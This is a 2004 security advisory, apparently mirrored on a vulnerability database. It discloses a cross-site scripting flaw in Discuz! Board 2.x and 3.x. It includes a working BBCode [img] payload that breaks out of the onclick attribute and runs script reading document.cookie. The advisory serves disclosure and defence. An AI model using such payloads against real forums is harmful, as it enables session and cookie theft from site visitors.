Lucene search
K

discuz.txt

🗓️ 05 Feb 2004 00:00:00Reported by Cheng Peng SuType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Possible Cross Site Scripting vulnerability in Discuz! Board versions 2.x, 3.x.

Code
`  
  
Advisory Name:Possible Cross Site Scripting in Discuz! Board  
Release Date: Feb 5,2004  
Application: Discuz! Board  
Version Affected: 2.x , 3.x  
Platform: PHP  
Severity: Low  
Discover: Cheng Peng Su(apple_soup_at_msn.com)  
Vendor URL: http://www.discuz.com/  
################################################  
Proof Of Concept:  
A thread including:  
[img]http://a.gif');(xss code);a=escape('a[/img]  
will be   
<img src="http://a.gif');(xss code);a=escape=('a" border="0" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" onmouseover="if(this.resized) this.style.cursor='hand';" onclick="if(this.resized) window.open('http://site/pic.gif');(xss code);a=escape('a');">  
  
So there will be a red 'x' instead of a normal pic,if visitor click the red 'x',the code will be executed.  
I think you know why i add " ;a=escape('a " after the xss code.  
  
Exploit:  
[img]http://a.gif');alert(document.cookie);a=escape=('a[/img]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2004 00:00Current
7.4High risk
Vulners AI Score7.4
19